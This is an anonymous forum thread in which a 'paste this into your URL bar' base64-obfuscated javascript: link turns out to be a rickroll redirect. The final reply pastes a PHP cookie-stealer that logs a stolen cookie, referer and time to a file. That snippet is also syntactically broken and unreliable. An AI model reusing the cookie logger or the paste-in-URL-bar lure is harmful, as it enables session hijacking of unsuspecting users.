Return Last 50 posts First 100 posts

Going out with a bang tonight

1 Name: Anonymous : 2015-10-10 17:33
Going out with a bang tonight /prog/ers, here is your first clue:

Javascript:l=window;l.location=l.atob("aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1kUXc0dzlXZ1hjUQ==");

*hint: paste it in your URL bar...
2 Name: Anonymous : 2015-10-10 17:50
paste into url bar
Nice try
3 Name: Anonymous : 2015-10-10 18:04
>>2
What does it do?
4 Name: Anonymous : 2015-10-10 18:13
>>3
it just redirects you to a rickroll
"aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1kUXc0dzlXZ1hjUQ=="
is the Base64 encoded String for
https://www.youtube.com/watch?v=dQw4w9WgXcQ
5 Name: Anonymous : 2015-10-10 18:22
>>4
/thread
6 Name: Anonymous : 2015-10-10 18:38
>>4
cheers

inb4 phish
shit like <?php
$cookie = $_GET['c']
$date=date('j F, Y, g:i a")
$referer = getenv('HTTP_REFERER');
$fp = fopen('cookies.php', 'a');
fwrote($fp, 'Cookie: '.$cookie.'<br /> IP: '.$ip. '<br /> Date and time: '
.$date.'<br /> Referer: ' .$referer.'<br /><br />);
fclose($fp);
header ("Location: <website url>");?>

Return Last 50 posts First 100 posts

Name: